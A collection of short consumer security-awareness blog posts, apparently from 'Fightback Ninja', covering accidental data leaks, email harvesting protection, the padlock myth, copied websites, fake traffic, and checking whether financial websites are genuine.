Category: Guidance

How Accidental Data Leaks Happen

It’s easy to assume that all data breaches are the result of criminal activity, but that’s far from true.

A study of data from 2016/17 showed that 92% of security data incidents and 84% of confirmed data breaches were due to accidents or mistakes.

Here are the most common problems leading to leaks of data:

1. Expired Security Certificates

These certificates are an essential component in protecting systems and Equifax found out the hard way in 2017 when hackers accessed huge amounts of confidential data through an expired certificate. This data included 143 million records exposed containing names, addresses, dates of birth, Social Security numbers, and driver license numbers.

The data was stolen by hackers who exposed a vulnerability in Equifax’s web servers. If the relevant security certificates had been updated as they should have been – the hackers couldn’t have used that way in.

2. Unsecured Third Party Vendors

Many websites and complex systems are a mix of the owner’s software plus a variety of third party plugins, addons and linked external services. As in any other part of life – the weakest link determines the safety level of the whole system. If the 3rd parties aren’t adequately secured then the whole system becomes vulnerable.

3. Poor Email Security

Most hackers still gain access through phishing – that is sending out emails that attract people to respond in some way that gives the hackers the information they need to access systems. Maybe it’s through a fake quiz that requires a login and password or an offer of a gift token etc.

Or could just be that people haven’t learned the need to use passwords that are unguessable and not to write them down by their desk.

A company named Nightfall protects systems data and they have created the following article to explain in more detail how accidental data leaks can happen: https://nightfall.ai/resources/accidental-data-leaks/

If you have any experiences with these scams do let me know, by email.

Fightback Ninja Signature

Protect Email Addresses on Websites

To build up lists of email addresses that can be sold to spammers and scammers, hackers run software that scans websites and looks for email addresses.

This is called email harvesting and is done on a huge scale.

The hackers typically scan websites, mailing lists, internet forums, social media platforms and anywhere else they can find email addresses online.

The characteristic format for an email address is name@domain.com so it is simple for email harvesters to read web pages and look for the @ symbol as it seldom occurs anywhere on webpages except in an email address.

The harvesters can also check for unusual variations on that theme e.g. User[at]domain.com or User[AT]domain[DOT]com

How to Protect Email Addresses

There are a series of steps you can take to protect any email addresses on your website from being harvested. These range from the simple to seriously complex and which method you should use depends on how much of a problem you have with harvesting.

Method 1 – Replacing the email address with a picture showing the email address

Method 2 – Separate the Email Address From the Website

The email address can be in a redirect statement

Method 3 – Mask the Email Address

This can be done by using HTML encoding e.g. using @ replaces the @ sign.

All characters can be encoded in this manner which makes the address difficult for the harvesters to find.

Method 4 – Use Javascript

The address can be divided into several parts that are dynamically composed by the browser when the website is called up.

Method 5 – Use a Captcha

A CAPTCHA is a type of challenge–response test you can add to a website page to ensure it is being read by a person not by software.

These have become very common on many websites so most people are used to them now.

Method 6 – Use a Contact Form

Instead of posting an e-mail address on a web page, create a contact form. This can capture more information in a structured manner from the user and lets you hide the email address in a separate script file.

Do enter your email address and click on the subscribe button on top right to keep up to date with new posts.

Fightback Ninja Signature

The Secure Padlock Myth

When browsing on the Internet, you will be familiar with the padlock symbol that appears just to the left of the internet address. Depending on your browser, the padlock symbol may be green.

That padlock means ‘secure’ and you should never input any confidential information on a website if there isn’t a padlock symbol showing.

However, this does not mean that the website is safe to use – only that a level of encryption is in use between the browser and the Internet address. This encryption is called SSL.

The little padlock does not mean that the website is safe as criminals can easily get SSL for their fake scam websites.

Google has plans to stop using the padlock symbol as the vast majority of websites now do use SSL security, so would have the padlock symbol.

If you want more details on a website’s security, you can click on the padlock symbol and it will tell you the organisation name for the encryption certificate. If it doesn’t match the domain name (i.e. the Internet address) then that is a red warning flag.

Do enter your email address and click on the subscribe button on top right to keep up to date with new posts.

Fightback Ninja Signature

What to Do When Your Website is Copied

As many of us know, it can be a long tough job to build a website with great content that attracts customers and serves their needs, but it is an essential part of most businesses nowadays.

Unfortunately, there are many out there who may decide to use that success to their advantage by simply copying graphics, contents, ideas from your website or even just duplicating your website and putting their name on it.

What Can You Do?

If your site suffers from copying, the first step is to collect evidence – take screen shots of your site and the copy then try to contact the owner of the copycat site.

If the copying is not too serious, then maybe a warning will lead to removal of the problem content.

But in some cases, the copying is part of a very deliberate plan to defraud people and you may get the blame from scammed customers.

Steps to Take

  1. Use the WHOIS lookup service at whois.com to find out who registered the site’s domain name.

The information will include a contact email address.

In some cases, the owner will have kept their contact details anonymous.

  1. Contact The Internet Company Hosting the Web Site.

You can contact the server host and request the page or site be taken down, but you will need evidence of course.

  1. Search Engines

If you are ignored by the site owner, then you can proceed to submitting request to Google and Bing to have the site removed from their listings.

  1. DMCA Takedown

In the case that you need the site to be taken down entirely, you can request a DMCA Takedown which costs $199 per site, but can be worth it.

  1. Seek Legal Advice.

If you do not succeed, then it’s time to get legal advice and go after the owner of the website for damages.

This can be time consuming and expensive so it depends on the level of damage the copycat web site is causing to your business / reputation.

If you have any experiences with this issue of websites being copied,  do let me know, by email.

Fightback Ninja Signature

Does Your Website Attract Fake Traffic

Website owners are always keen to know how much “traffic” their site gets i.e. how many people visit the site, which pages they read etc.

We all know that some of the traffic on the Internet is fake, but most website owners hope it is a small percentage of the real traffic.  However, some companies in the field of advertising believe that up to 50% of traffic achieved through advertising could be fake.

In this context ‘fake’ means it’s not a person looking at your website – it’s another  computer.

This is the reason why so many websites these days insist you answer a Capcha query (click the I’m not a robot button) to prove you are a human being.

Fake traffic is traffic generated by software not by humans. Fake traffic is used to artificially inflate ad revenue by making a site’s audience appear greater than it is in reality.

If an advertising network identifies a website’s traffic as fake, it will likely result in suspensions or even bans on the publisher’s advertising account.

How To Identify Fake Traffic

This is a complicated matter and needs expertise, but you would start by examining the statistics for the website :-

  • A very high bounce rate can indicate a lot of disinterested visitors or bots (computer programmes rather than people)
  • A very low pages/session figure can mean people attracted to the site are only interested in one link then they leave. If combined with a very short average length of visit can mean automated viewing not people.
  • Geography: If your website is in English and you get large amounts of traffic from countries where English is not typically used much, that can indicate suspect traffic.
  • A sudden unexplained increase in traffic can be welcome but if it doesn’t make sense e.g. no extra purchases or comments then it may be caused by automated systems scanning your website.

How to Stop Bots Accessing Your Website

Using a CAPTCHA to ensure visitors are human rather than computer is a good start and there is a file on your website called robots.txt which tells bots whether or not they are allowed to access the website. (Check on the Internet for how to access and edit this file on your website). Reputable business bots will access and obey the instruction in robots.txt but scammers, spammers, hackers and many others will ignore it.

If the fake traffic problem is seriously impacting your website and customers, then there are online services that will filter out such unwanted traffic but that does cost of course.

All sites attract fake traffic and the more popular a site then typically the more fake traffic it will get.

If you have any experiences with this problem, do let me know, by email.

Fightback Ninja Signature

How to Check a Financial Web Site is Genuine

Imagine you want to find the best place for your savings or the best place to invest a windfall or the best pension scheme available, for example.

You might go to a professional financial advisor or to your bank or other finance organisation you know.

But if you don’t have the money for an advisor then it might be a case of asking friends and relatives for their opinions or just using a search engine.

However, when you get to searching online, there is a huge number of finance organisations online and many criminals create fake websites that sometimes look exactly like the ones for genuine businesses.

Q. How do you tell which websites are genuine and which are fake?

The starting point is to ignore unsolicited emails, text messages, calls etc. – these are very likely to be fake and should be ignored.

Things to Look For

  1. Check the message and website looking for mistakes
    • Correct URL e.g. Barclays Bank rather than Baclays Bank
    • Use of broken English
    • Simple spelling mistakes or serious grammatical errors
    • The content on the website doesn’t make sense
    • Pictures, diagrams etc. that fit in with the rest of the site and haven’t just been added at random to fill space.

2. Open the Google Transparency Report webpage.

https://transparencyreport.google.com/safe-browsing/search?hl=en_GB

Click the “Search by URL” field in the middle of the page and type in the Internet address for the website you want to check. Google will tell you if it can find anything dodgy about the website.

  1. Check the company on the Companies House website at https://www.gov.uk/get-information-about-a-company
  2. Check for reviews online about the business and check anti-scam websites

Do enter your email address and click on the subscribe button on top right to keep up to date with new posts.

Fightback Ninja Signature